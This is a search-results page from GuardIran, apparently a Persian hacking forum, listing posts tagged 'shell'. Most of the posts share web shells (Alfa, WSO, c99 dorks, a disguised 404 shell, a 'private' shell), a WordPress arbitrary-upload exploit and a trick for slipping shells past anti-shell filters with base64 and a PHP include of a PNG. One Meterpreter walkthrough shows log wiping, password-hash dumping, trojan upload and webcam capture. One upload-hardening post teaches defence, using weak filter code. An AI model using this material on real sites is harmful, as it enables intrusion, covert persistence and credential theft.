رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'shell'.

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Microtics
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

وبلاگ‌ها

چیزی برای نمایش وجود ندارد


جستجو در...

نمایش نتایجی که شامل...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد...

تاریخ عضویت

  • شروع

    پایان


گروه


About Me

25 نتیجه پیدا شد

  1. × حفره امنیتی و یا همان باگ چیست ؟ » به نقص ها و سهل انگاری های برنامه نویسان، طراحان وب سایت ها، در کارهای خود به جای میگذارند، نفوذگر آنها را پیدا کرده و از طریق این حفره ها اقدام به نفوذ میکند را باگ می گویند ! × تارگت چیست ؟ » معنی اصلی این کلمه یعنی هدفی که از قبل تعیین شده، به طور مثال نفوذگر پس از جمع آوری کامل اطلاعات از یک وب سایت فهمیده است که این وب سایت حفره امنیتی دارد و میتواند از طریق این حفره ها و باگ ها اقدام به نفوذ کند و آن را هدف و یا تارگت خود قرار میدهد ! × اکسپلویت چیست ؟ » به یکسری کد های مخرب که توسط مهاجم و یا همان نفوذگر نوشته میشود را اکسپلویت می نامند. × پیلود چیست ؟ » به یکسری کد های مخرب وظیفه انتقال پکتهای ارتباطی بین دو کامپیوتر یا چندبن کامپیوتر به صورت غیر مجاز را دارند پیلود میگویند. × کیلاگر چیست ؟ » نرم افرار و یا برنامه ای برای دسترسی به تمامی کلمات و یا حروفی که بر روی صفحه کلید تارگت تایپ میشود را ذخیره و برای نفوذگر ارسال میشود،این کلمات میتوان از انواع آدرس ها مانند حساب های بانکی، پسورد ها و را در نظر گرفت ! × بایپس چیست ؟ » به معنای دور زدن هست یعنی هکر با روش های خاصی موانع امنیتی را دور میزند ! × کلاینت چیست ؟ » سیستم های که از یک سرور خدمات دریافت میکنند را کلاینت های می نامند، برای مثال شما یک کلاینت هستید ! × شل چیست ؟ » در هک هنگامی که هکر با استفاده از ابزارها و کارهای خود میتونه به سیستم قربانی نفوذ کنه و کنترل سیستم رو بدست بگیره اصطلاحا میگن شل گرفته و میتونه تصمیمات خودش رو عملی کنه ! × دیفیس چیست ؟ » وقتی یه هکر سایتی رو هک میکنه ، نمای صفحه اصلی (یا بقیه صفحه های) سایت رو تغییر میده و ممکنه اسم خودش رو هم درج کنه و مسئولیت هک سایت رو بپذیره به این صفحه دیفیس پیج میگویند ! × مس دیفیس چیست ؟ » مس دیفیس هم مثل همون دیفیس هست با این فرق که شما وقتی تمام سایت های متعلق به یک سرور خاص رو دیفیس کنید میگویند مس دیفیس انجام داده اید ! × بک دور چیست ؟ » در هک وقتی یه هکر به سیستمی نفوذ کرد عمدا راه دومی برای نفوذهای بعدی در سیستم هک شده قرار میده تا اگه یوقت احیانا راه نفوذ فعلی شناسایی و بسته شد بتونه با کمک در پشتی که ایجاد کرده دوباره نفوذ کنه ! هماهنگ شده با ادمین عزیز @proxy
  2. MSACMS با سلام خدمت تمام دوستان و مدیران عزیز سایت گاردایران در این تاپیک برای شما یک خدماتی رو می خواهم ارائه بدهم نام خدمات msacms هست که سه cms : 1.wordpress 2.drupal 3.joomla رو بالا اوردم تا بتوانید به صورت رایگان با cms ها کار کنید و اسیب پذیری و باگ پرایوت پیدا کنید ، همچنین اسیب پذیری توی در پوسته ها و پلاگین ها و .... این خدمات مثل یک ازمایشگاه می مونه که مثلا : شما میای روی یکی از cms های دلخواه تست اسیب پذیری انجام می دهید و روی پلاگین های ورژن دلخواه و پوسته دلخواه و ... و مثلا یه کسی که خیلی بلد نیست میاد و کار با cms رو یاد میگیره . و هر دوستی اگر خواست درخواست می دهد و یه cms به صورت دلخواه با ورژن دلخواه برای اون نصب می شود . ادرس خدمات MSACMS : MR-MSA.XYZ : username & password یوزرنیم و پسورد cms ها : guardiran اما زمانی که شما یک cms رو انتخاب می کنید یه یوزر و پسورد می خواد که خیلی قوی هست و فقط یک بار باید بزنید .(برای امنیت بالا این کار انجام شده که هر فردی نتواند استفاده کند ) در ورژن ۱ برای دریافت یوزرنیم و پسورد به صورت خصوصی در سرور discord گاردایران و یا در قسمت پیام رسانی گاردایران باید به من پیام می دادید ، اما در ورژن ۱.۲.۰ برای شما یوزر و پسورد رو در فایل ضمیمه قرار دادم . (در تایپک دوم موجود است ) ------------------------------------------------------------------------------------------------------------------------------------------------------------- نکات مهم زمان استفاده از سایت : ۱- پسورد و یوزر cms ها همیشه guardiran هست و نباید تعویض گردد . ۲- هر روز cms ها چک می شود . ۳- هر ۳ روز یک بار در صورت لزوم cms ها ریست می شوند . ۴- فقط تا ۳ فایل و حداکثر ۱۰ مگابایت می تونید اپلود کنید . ۵- برای دریافت رمز عبور حتما باید در انجمن گاردایران ثبت نام کنید . ۶- اگر یک زمان خواستید برای مثال ببینید که می توان در این اپلودر شل اپلود کرد یا نه به جای شل از یک فایل php استفاده کنید . ۷- هیچ زمان شل اپلود نکنید ، چون اکانت شما به صورت خودکار بن می شود و دیگر قابل برگشت نیست (به دلیل شناسایی فایروال ) ۸- هیچ زمان به سایت حملات ddos نزنید چون موفق نمی شوید . ۹ - این cms به صورت مداوم بروز می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سرور : DDOS در حملات دیداس به شبکه خود دیتاسنتر وارد عمل می شود و آنتی دیداس را فعال می کند در حملات دیداس به سایت ها بخاطر مانیتورینگ لحظه ای که سرور دارد سریعا دسترسی به ایران محدود می شود تا حملات خنثی شود . Firewall در ورژن ۱ سرور دارای فایروال نرم افزاری CSV بود اما در ورژن ۱.۲۰ فایروال cloudflare رو هم اضافه کردیم . Shell سرور دارای انتی شل است و به علاوه فایروال مانع اجرا و استفاده از شل می شود . Backup سایت روزانه بک اپ گیری می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سایت : سعی کردم روی امنیت سایت کار کنم و سایتی با خدمات خوب و البته امنیت بالا ارائه بدهم و در آینده امنیت بالا تر رفته و سایت بهبود می بخشد. ------------------------------------------------------------------------------------------------------------------------------------------------------------- گزارش باگ : اگر دوستی با باگی در خود سایت مواجه شد و یا دوست داشت مورد امنیتی رو در رابطه با خود سایت گزارش بدهد به صورت خصوصی به من گزارش بده تا رفع بشود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- CMS مورد نظر : اگر دوستی cms خواست تا براش نصب کنم به من پیام خصوصی بدهد . اطلاعات شامل : نوع cms ورژن مورد نظر لینک دانلود ------------------------------------------------------------------------------------------------------------------------------------------------------------- قوانین تاپیک : هر سوال داشتید در بخش سوال و جواب ها ، در غیر این صورت پاسخ داده نمی شود . انتقادات و پیشنهادات خودتون رو به صورت خصوصی به من ارسال کنید . مشکلات و خطا ها رو به صورت خصوصی ارسال کنید . ------------- ------------- ------------- تایید شده توسط مدیران بخش ‌: R3DN4X314 و proxy ------------- ------------- ------------ ورژن 1.0.0 رونمایی می کند : mr-msa.xyz ورژن 1.2.0 رونمایی می کند : mr-msa.xyz ورژن 1.3.0 رونمایی می کند : mr-msa.xyz ورژن 1.4.0 رونمایی می کند : mr-msa.xyz ورژن 1.5.0 رونمایی می کند : mr-msa.xyz این خدمات به صورت کامل متعلق به انجمن تیم امنیتی گاردایران بوده و هر گونه کپی برداری ، اسیب رساندن به خدمات و ... تخلف محسوب می شود و پیگرد قانونی دارد .
  3. وقتی برنامه vs code در لینوکس اجرا می شود خطای unable to resolve your shell environment رو نمایش می ده !!؟؟؟
  4. MR.MSA

    بایپس آنتی شل

    با سلام خدمت کاربران و مدیران سایت گارد ایران در این تاپیک قصد دارم به شما آموزش دور زدن آنتی شل رو بدم که شاید بیشتر جاها بدردتون بخوره . روش اول : دو بار encode کردن شل با base64 که می توانید از این سایت کمک بگیرید . --------------- روش دوم : شل رو به فرمت png تغییر دهید . یک فایل دیگر با فرمت php بسازید و این کد رو در اون قرار دهید : <?php include_once("shell.png"); ?> تا سایت اون فایل رو با فرمت php بخونه . --------------- پیشنهاد می کنم هر دو روش رو در کنار هم انجام دهید تا انتی شلر بهتر بایپس شود . امیدوارم از این تاپیک لذت برده باشید و بدردتون بخوره و تاپیک خوبی رو گذاشته باشم .
  5. با سلام خدمت دوستان عزیز گاردایران . من توی کانال های مختلف هک ، لینوکس ، برنامه نویسی .. هستم و بعضی ها رو می بینم که تم ترمینالشون رو عوض می کنن که خیلی جذابیت می ده به کار ما هکر ها . پس منم رفتم نحوه تغییر تم رو یاد گرفتم ، توی انجمن که گشتم چنین پستی نبود ، پس گفتم اموزشش رو بزارم . خب ابتدا دستورات زیر به ترتیب می زنید : > sudo apt install figlet > sudo apt install lolcat > sudo apt install gem > sudo apt install ruby Figlet : برای اینکه بتونیم یک متن رو به صورت بزرگ برای مثال Mr.MSA رو زمانی که ترمینال باز می شود نمایش دهیم از figlet استفاده می کنیم . که فونت های مختلف در اینجا موجود است. lolcat : برای اینکه به متن خودمون رو به صورت رندم رنگ هایی رو بدیم از lolcat استفاده می کنیم . Gem & Ruby : پیشنیاز های lolcat . حالا برای اینکه بتونیم از lolcat استفاده کنیم از این دستور استفاده می کنیم : gem install lolcat و برای اینکه سیستم ابزار ها رو بشناسه از این دستور استفاده کنید : sudo apt update ---------------------------------------------------------------------------------------------------------------- خب حالا شما با دستور زیر می تونید متن خودتون رو بصورت بنر و رنگ های رندم نمایش دهید : figlet MR.MSA | lolcat خب حالا می خواهیم برای همیشه زمانی که ترمینال رو باز می کنیم این متن رو نمایش بده . ابتدا oh my zsh رو نصب کنید : نصب با curl : sh -c "$(curl -fsSL [Hidden Content])" نصب با wget : sh -c "$(wget [Hidden Content] -O -)" نصب با github : [Hidden Content] نصب تم در zsh : بعد از نصب zsh شما ابتدا این دستور رو می زنید : cd ~ بعد این دستور برای ادیت کردن فایل .zshrc vim .zshrc در اون فایل دنبال این کلمه بگردید : ZSH_THEME="robbyrussell" اون کلمه ای که بین " است نام تم zsh هست که به صورت پیش فرض robbyrussell هست . برای تغییر دادنش شما باید به این ادرس بروید : [Hidden Content] و بر اساس عکس هایی که گذاشته شده نام تم رو انتخاب کنید و در این قسمت قرار دهید : ZSH_THEME=" نام تم مورد نظر " نمایش بنر دلخواه با رنگ رندم : برای اینکار در همان فایل .zshrc در خط اخر این دستور رو بزاید : figlet 'Mr.MSa' | lolcat و به جای Mr.MSA متن مورد نظر خودتون رو بنویسید . حالا این کلید ها رو به ترتیب روی کیبورد برای خارج شدن از ادیتور vim و سیو کردنش فشار دهید : 1) esc 2) : 3) w 4) q حالا در قسمت edit profile ترمینال در قسمت کامند شل پیش فرض که bash هست رو به zsh تغییر بدید یعنی : /bin/bash به این تغییر می کنه : /bin/zsh حالا یک بار از ترمینال خارج بشید و دوباره ترمینال رو باز کنید و مشاهده می کنید که ترمینال شما نسبت به روز اول زیبا تر شده است . و می توانید با دستورات zsh چیز های دیگه هم بزارید یا حتی همین دستور رو چند بار دیگه بنویسید با متن های مختلف . این یه فایل PDF آموزشی است که دوست عزیز دیفیسرمون HCSH4C39 نوشته که می تونید به همراه این تاپیک از این آموزش هم استفاده کنید : HCSH4C39.pdf موفق و پیروز باشید .
  6. MR.MSA

    جلوگیری از باگ RFU

    با سلام خدمت کاربران و مدیران عزیز گارد ایران در این پست قصد دارم به شما نحوه پچ باگ RFU بدم . RFU : Remote File Upload یک توضیح مختصر : هنگام اپلود یک فایل در سرور این اسیب پذیری به وجود می اید که هکر فایل مخرب خودش رو در سرور آپلود می کند (shell) به صورت کلی این اسیب پذیری بسیار خطر ناک است و باعث می شود که هکر دسترسی کامل به سایت بگیرد ولی حالت های دیگری هم وجود دارد که خطر این باگ کمتر می شود مثلا هکر نمی تواند فایل php خودش که شل است رو آپلود کنه به جای آن فایل html خودش که دیفیس پیج است رو آپلود می کنه یه کمی توضیح طولانی شد خب حالا میریم سراغ جلو گیری از باگ RFU در کد نویسی اولین قدم باید فایل ها در یک جای مشخص و خاص باشد می توانید از این دستور استفاده کنید : move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$_FILES['upload']['name']}"); الان فایل های اپلودی در فولدری به نام Guardiran قرار می گیرند . حالا برای اینکه فایل های php قابل آپلود نباشند : if(end(explode('.',$_FILES['upload']['name'])) !== 'php'){ move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$_FILES['upload']['name']}"); }else{ } تا الان آپلودر ما کمی وضعیتش بهتر شده بعضی از سایت ها از این فیلترینگ استفاده می کنند ولی امنیت بسیار پایینی دارد چون زبان php به حروف بزرگ و کوچک حساس است یعنی ما گفتیم با در آخر نام ... php نباشد اما برای مثال هکر با این نام اپلود می کند b374k.PHP که هر دو فرمت php هستند اما از نظر حروف کوچک و بزرگ باهم فرق دارند پس کد های خودمون رو تغییر می دهیم . به این صورت : if(end(explode('.',$_FILES['upload']['name'])) == 'jpg'){ move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$_FILES['upload']['name']}"); }else{ } الان یک اپلودر با امنیت خوب داریم ولی هنوز با بایپس ها و متد و... امکان دور زدن وجود دارد پس امنیت رو بالا تر می بریم تا کار هکر سخت تر شود . کاری می کنیم که هکر به راحتی فایل خودش رو پیدا نکنه و از تابع rand استفاده می کنیم و کد ها رو به این صورت می نویسیم :‌ if(end(explode('.',$_FILES['upload']['name'])) == 'jpg'){ $ch = rand(); move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$ch}.jpg"); }else{ } می توانید بعد از else (در غیر این صورت ) خطای خود را با html و css طراحی کنید . چند راه پیشنهادی جهت رفع بهتر باگ RFU : بهتر است که از یک سرور اختصاصی استفاده کنید و فایل های اپلودی خودتون رو در یک سرور دیگر آپلود کنید . دایرکتوری فایل های اپلود با دایرکتری فایل های اصلی متفاوت باشد . امیدوارم از این پست لذت برده باشید . Download Uploader.zip
  7. R3DN4X314

    اسکریپت های تمرینی Bash Shell

    100 نمونه از اسکریپت های نوشته شده با Bash با توجه به اتمام بخش های اول و دوم از اموزش اسکریپت نویسی با شل بش ، و همچنین توانایی خوندن و نوشتن بخش زیادی از انواع اسکریپت ها ، این نمونه هارو براتون قرار دادم تا به عنوان یه بخش تمرینی مورد استفاده قرار بگیره لینک دانلود : [Hidden Content]
  8. R3DN4X314

    اموزش کامل اسکریپت نویسی

    اموزش کامل اسکریپت نویسی مجموعه اموزشی اسکریپتینگ از سه بخش اصلی تشکیل میشه بخش اول کامند لاین و پیش نیاز های اسکریپت نویسی رو تشکیل میده در بخش دوم اسکریپت نویسی رو از پایه شروع میکنیم و تا سطح متوسط پیش میریم (صفحه دوم) و در بخش سوم مباحت مربوط به اسکریپت نویسی پیشرفته رو دنبال میکنیم لطفا به هیچ عنوان اسپم ندید و اگر امری بود در پیام خصوصی عنوان کنید __________________________________________________________________________________________________________________ بخش اول - قسمت یکم یکی از راه های وصل شدن به CLI یا command line interface یا همان رابط کاربری خط فرمان ، استفاده از لینوکس بدون دسکتاپ هستش درست مثل لینوکس در دوران قدیمش که شما فقط با یک محیط ویژال کنسول سر و کار داشتید برای ویژال کنسول کردن محیط گرافیکی هم میتونیم از Alt + Ctrl + F1 / F7 استفاده کنیم که هر کدوم از اف ها یک محیط ویژال کنسول مجزا برامون فراهم میکنن که مستقیم به ران لول عمیق تر وصل اند و حتی میتونیم همزمان با یوزر های مختلف لاگین کنیم هر کدوم از این محیط های کنسولیه مجزا شماره ی مربوط به خودشون رو دارن که در tty دیده میشه مثلا وقتی شما با Alt + Ctrl +F2 دومین محیط کنسولیه خودتون رو باز میکنید و با همون یوزر یا یوزر دیگه ای لاگین میکنید در اولین خط مقدار tty2 رو میتونید ببینید که نشون میده شما در دومین محیط کنسولیتون قرار دارید برای شیفت کردن بین tty ها از همون Alt + Ctrl + F با شماره ی tty مورد نظر استفاده میشه تو این مورد F1 ( برگشتن از محیط کنسولیه دوم ( با مقدار tty2 ) به محیط کنسولیه اولیه ( با مقدار tty 1 ) ) بعد از شیفت کردن بین کنسول ها ، تمام کنسول ها با هر یوزری که دارن در حالت لاگین میمونن و اعمالی که باهاشون انجام شده هم دست نخورده باقی میمونه که این موضوع انسجام و انعطاف قابل توجهی به وجود میاره ما میتونیم درون محیط های کنسولی هم از text mode console terminal برای کاستومایز کردن محیط کنسول استفاده کنیم با استفاده از دستور setterm برای مثال من چند مورد رو قرار میدم ، که البته خودتون با help میتونید لیست متنوع دستور setterm رو ببینید setterm -background black white red blue green yellow magenta cyan تغیر رنگ پس زمینه به یکی از رنگ هایی که اسمش رو نوشتم setterm -foreground green تغیر رنگ متن به سبز ( یا هر رنگی که اسمش رو بنویسید ) inversescreen on or off برعکس کردن رنگ زمینه و متن store ذخیره ی تغیرات reset برگشت به حالت پیش فرض روش بعدی وصل شدن به شل استفاده از ترمینال های گرافیکی از داخل محیط دسکتاپ هستش این ترمینال ها روی کنسول کار میکنن ولی از داخل محیط گرافیکی دسکتاپ ترمینال های مختلفی در محیط گرافیکی وجوده که هر کدوم اپشن های خودشون رو دارن ، ولی چون کار اصلیه مارو شل ها انجام میدن و این ترمینال ها صرفا رابط هستن ، استفاده از هر کدومشون بیشتر جنبه ی سلیقه ای داره در زیر من لیست پر استفاده هاشون رو با سایت هاشون برای علاقه مندان میزارم Eterm [Hidden Content] Final Term [Hidden Content] GNOME Terminal [Hidden Content] Guake [Hidden Content] Konsole Terminal [Hidden Content] LillyTerm [Hidden Content] LXTerminal [Hidden Content] mrxvt [Hidden Content] ROXTerm [Hidden Content] rxvt [Hidden Content] rxvt-unicode [Hidden Content] Sakura [Hidden Content] st [Hidden Content] Terminator [Hidden Content] Terminology [Hidden Content] tilda [Hidden Content] UXterm [Hidden Content] Wterm [Hidden Content] xterm [Hidden Content] Xfce4 Terminal [Hidden Content] Yakuake [Hidden Content] خوب دوستان این قسمت بیشتر جنبه ی مقدمه ی بخش اول و اشنایی علاقه مندان با کنسول رو داشت به همین دلیل سعی کردم خیلی کوتاه و خلاصه توضیحش بدم ، در قسمت دوم دستورات خط فرمان رو شروع میکنیم
  9. همونطور که میدونید meterpreter یکی از payload های تعاملی و قدرتمند metasploit هستش که از اهمیت مخصوصی برخورداره اینجا ما با تعدادی از دستورات پرکاربرد و عمومیش با یک توضیح مختصر اشنا میشیم و از خروجی دستورات به عنوان مثال اطلاعات کسب میکنیم : HELP این دستور همونطور که از اسمش مشخصه برای دیدن منوی help در meterpreter استفاده میشه : meterpreter > help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session channel Displays information about active channels ...snip... BACKGROUND این دستور برای ارجاع سیشن فعلی به بک گراند استفاده میشه ، و پس از اون دستورات در msf اجرا میشن برای برگشتن به سیشن کافیه دوباره باهاش تعامل برقرار کنید : meterpreter > background msf exploit(ms08_067_netapi) > sessions -i 1 [*] Starting interaction with 1... CAT مثل بش شل لینوکس محتوای فایلی که به عنوان ارگمان بهش داده بشه رو نمایش میده : meterpreter > cat Usage: cat file Example usage: meterpreter > cat edit.txt guardiran digital security team CD and PWD این دو دستور هم باز مثل بش شل برای تغیر مسیر و نمایش ادرس مسیر فعلی در فایل سیستم استفاده میشه : meterpreter > pwd c:\ meterpreter > cd c:\windows meterpreter > pwd c:\windows meterpreter > CLEAREV با استفاده از این دستور در ویندوز لاگ های امنیتی ، سیستمی و اپلیکیشن ها پاکسازی میشن : meterpreter > clearev [*] Wiping 97 records from Application... [*] Wiping 415 records from System... [*] Wiping 0 records from Security... DOWNLOAD موقع استفاده از دستور دانلود باید نوع سیستم عامل تارگت در نظر گرفته بشه ، به خاطر تفاوت نوع ادرس های فایل سیستم هاشون : meterpreter > download c:\\boot.ini [*] downloading: c:\boot.ini -> c:\boot.ini [*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini EDIT با این دستور میتونیم در هاست تارگت یه فایل برای نوشتن باز کنیم : meterpreter > ls Listing: C:\Documents and Settings\Administrator\Desktop ======================================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- . ...snip... . 100666/rw-rw-rw- 0 fil 2012-03-01 13:47:10 -0500 edit.txt meterpreter > edit edit.txt EXECUTE با استفاده از این دستور میتونیم در هاست تارگت فایل و کامند اجرا کنیم : meterpreter > execute -f cmd.exe -i -H Process 38320 created. Channel 1 created. Microsoft Windows [Version 5.1.2600] (C) Copyright Microsoft Corp. C:\WINDOWS\system32> GETUID با این دستور یوزری که در هاست تارگت شل رو اجرا میکنه نمایش داده میشه : meterpreter > getuid Server username: NT AUTHORITY\SYSTEM HASHDUMP با این دستور محتوای دیتابیس SAM رو میتونیم دامپ کنیم : meterpreter > run post/windows/gather/hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hashes... Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3::: dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9::: victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d::: IDLETIME این دستور ثانیه هایی که یوزر ریموت روی هاست idle شده رو نمایش میده : meterpreter > idletime User has been idle for: 5 hours 26 mins 35 secs IPCONFIG این دستور اینترفیس و ادرس های سخت افزاری و نرم افزاری ماشین هدف رو نمایش میده : meterpreter > ipconfig MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address : 127.0.0.1 Netmask : 255.0.0.0 AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport Hardware MAC: 00:0c:29:10:f5:15 IP Address : 192.168.1.104 Netmask : 255.255.0.0 LPWD and LCD این دستورات جالب همون cd و pwd هستند با این تفاوت که لوکال اجرا میشن ، مثال زیرو ببینید : meterpreter > lpwd /root meterpreter > lcd MSFU meterpreter > lpwd /root/MSFU meterpreter > lcd /var/www meterpreter > lpwd /var/www LS مثل نمونه شل برای لیست کردن فهرست استفاده میشه : meterpreter > ls Listing: C:\Documents and Settings\victim ========================================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir Sat Oct 17 07:40:45 -0600 2019 . 40777/rwxrwxrwx 0 dir Fri Jun 19 13:30:00 -0600 2019 .. 100666/rw-rw-rw- 218 fil Sat Oct 03 14:45:54 -0600 2019 .recently-used.xbel 40555/r-xr-xr-x 0 dir Wed Nov 04 19:44:05 -0700 2019 Application Data ...snip... PS این دستور هم مثل نمونه بش شل برای لیست کردن پروسه ها کاربرد داره : meterpreter > ps Process list ============ PID Name Path --- ---- ---- 132 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe 152 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe 288 snmp.exe C:\WINDOWS\System32\snmp.exe ...snip... SEARCH همونطور که از اسمش مشخصه برای جستجو استفاده میشه ، مثال : meterpreter > search -f autoexec.bat Found 1 result... c:\AUTOEXEC.BAT meterpreter > search -f sea*.bat c:\\xamp\\ Found 1 result... c:\\xampp\perl\bin\search.bat (57035 bytes) SHELL با استفاده از دستور شل ، یک شل استاندارد از ماشین تارگت دریافت میکنیم : meterpreter > shell Process 39640 created. Channel 2 created. Microsoft Windows [Version 5.1.2600] (C) Copyright Microsoft Corp. C:\WINDOWS\system32> UPLOAD موقع استفاده از این دستور هم مثل دستور دانلود باید نوع سیستم عامل تارگت برای جلوگیری از بروز خطا در نظر گرفته بشه ، با توجه به تفاوت ادرس های فایل سیستم هاشون : meterpreter > upload evil_trojan.exe c:\\windows\\system32 [*] uploading : evil_trojan.exe -> c:\windows\system32 [*] uploaded : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe WEBCAM_LIST با استفاده از این دستور یه لیست از وبکم های متصل به تارگت دریافت میکنیم : meterpreter > webcam_list 1: Creative WebCam NX Pro 2: Creative WebCam NX Pro (VFW) WEBCAM_SNAP در این دستور با انتخاب و مشخص کردن وبکمی که با دستور قبل شناسایی کردیم میتونیم با وبکم موردنظر عکس بندازیم ، که با اپشن h- میتونیم از مزایای مختلفش مطلع بشیم : meterpreter > webcam_snap -i 1 -v false [*] Starting... [+] Got frame [*] Stopped Webcam shot saved to: /root/Offsec/YxdhwpeQ.jpeg
  10. R3DN4X314

    shell 404

    شل نوستالوژیکه 404 صفحه اول این شل یه اررور پوششیه که صفحه مورد نظر پیدا نشد (برای مخفی سازی) که برای گذشتن از این صفحه پسورد لازمه (وارد کردن پسورد در کادر مخفی) هم پسورد به صورت رمزنگاری شده ، و هم صفحه ارور (با توجه به صفحات تارگت) قابل تعویض هستند دستور دانلود : git clone [Hidden Content] تصویر و مختصر توضیح برای اشنایی بیشتر با شل : [Hidden Content]
  11. mostafaRAT

    Alfa Shell 3.0.2

    با سلام جدید ترین نسخه شل آلفا رو میخوام براتون بزارم دو نسخه ENCODE وDECODE شده دریافت فایل alfa3.0.2ENCODE.php دریافت فایل alfa3.0.2DECODE.php
  12. RedNofozi

    چند شل آماده

    شل.rarبا سلام نزدیک ده تا شل پر کاربرد برای شما اماده کردم ا میدوارم خوشتون بیاد
  13. سلام. یه آموزشی تصویری تهیه کردم در خصوص استفاده از باگ افزونه ی Dreamwork gallery توی وردپرس که میشه باهاش فایل مدنظر رو توی سایت آپلود کرد. رمز فایل : guardiran.org موفق باشید 1-Wordpress - arbitrary file upload - GuardIran.part1.rar 1-Wordpress - arbitrary file upload - GuardIran.part3.rar 1-Wordpress - arbitrary file upload - GuardIran.part2.rar
  14. mownten

    گوگل دورک یافتن شل c99

    اینم از لقمه آماده اگر کسی رفته باشه جایی شل c99 آپلود پیدا کرده باشه چطور ما هم اون شل رو پیدا کنیم؟ به دلیل طولانی بودن لیست، توی یه فایل متنی گذاشتمشون. رمز عبور : guardiran.org Shell c99 google dorks - guardiran.org.rar
  15. 1TED

    Guardiran Private Shell

    سلام ../ یه مدت پیش یه شلی طراحی شده بود که در بخش زیر زمین نگه داری میشد این تصمیمو گرفتم که این شل رو پابلیک کنم تا دوستان هم بتونن استفاده کافی رو ببرن یا حـ ـق ../ پیوستـ شد priv8.php
  16. بسم الله الرحمن الرحیم باسلام در این قسمت شما با شل WSO 2.3 اشنا میشید بصورت کامل. دوستانی هم که کار با این شل رو بلدن خواهشا بزارید تا علممون بره بالا. سوالی داشتین درخدمتم. info_wso_2.3.rar
